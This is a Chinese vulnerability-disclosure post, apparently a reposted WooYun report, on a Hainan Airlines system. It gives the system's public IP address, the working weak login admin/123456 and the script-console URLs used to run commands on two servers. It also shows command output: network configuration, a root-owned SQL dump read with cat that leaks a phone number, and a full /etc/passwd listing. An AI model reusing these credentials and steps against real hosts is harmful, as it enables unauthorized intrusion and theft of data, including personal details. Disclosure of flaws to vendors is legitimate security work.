神刀安全网

漏洞标题: 海南航空某系统弱口令导致两台主机命令执行

漏洞详情

披露状态:

2016-06-02: 细节已通知厂商并且等待厂商处理中
2016-06-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

6月份例行打卡.

详细说明:

http://111.202.107.86:8080/

弱口令 admin 123456

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

http://111.202.107.86:8080/user/gang.hu/configure

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

http://111.202.107.86:8080/user/wangze/configure

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

两台终端命令执行

第一处 http://111.202.107.86:8080/computer/(master)/script

ifconfig -a

code 区域
em1       Link encap:Ethernet  HWaddr 54:9F:35:10:D7:34  
inet addr:111.202.107.86 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::569f:35ff:fe10:d734/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5470859 errors:0 dropped:0 overruns:0 frame:0
TX packets:5268871 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2385907701 (2.2 GiB) TX bytes:1189720238 (1.1 GiB)
Interrupt:35

em2 Link encap:Ethernet HWaddr 54:9F:35:10:D7:35
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38

em3 Link encap:Ethernet HWaddr 54:9F:35:10:D7:36
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34

em4 Link encap:Ethernet HWaddr 54:9F:35:10:D7:37
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:33300 errors:0 dropped:0 overruns:0 frame:0
TX packets:33300 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2280784 (2.1 MiB) TX bytes:2280784 (2.1 MiB)

第二处 http://111.202.107.86:8080/computer/slave/script

code 区域
em1       Link encap:Ethernet  HWaddr B0:83:FE:DF:3F:0A  
inet addr:111.202.107.85 Bcast:111.202.107.87 Mask:255.255.255.248
inet6 addr: fe80::b283:feff:fedf:3f0a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4932487 errors:0 dropped:0 overruns:0 frame:0
TX packets:4832674 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1930307007 (1.7 GiB) TX bytes:1592031438 (1.4 GiB)
Interrupt:35

em2 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0B
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:38

em3 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0C
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:34

em4 Link encap:Ethernet HWaddr B0:83:FE:DF:3F:0D
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:36

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:131027 errors:0 dropped:0 overruns:0 frame:0
TX packets:131027 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:106172131 (101.2 MiB) TX bytes:106172131 (101.2 MiB)

命令执行的就是这两台服务器

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

第二处 还是root权限

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

-rw-r–r–. 1 root root 4589636 8月 27 2015 /root/cc_haihang.sql

cat /root/cc_haihang.sql

mask 区域
*****admin` *****
*****`admin` DIS*****
*****9C9C93','[email protected]','15810985173','客服',18,2147483647,1439174061,NULL,'1'),(36,'opera*****
*****`admin` ENA*****
*****TABL*****

漏洞标题:  海南航空某系统弱口令导致两台主机命令执行

漏洞证明:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin

avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

gdm:x:42:42::/var/lib/gdm:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

pulse:x:497:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin

修复方案:

弱口令

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 海南航空某系统弱口令导致两台主机命令执行

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址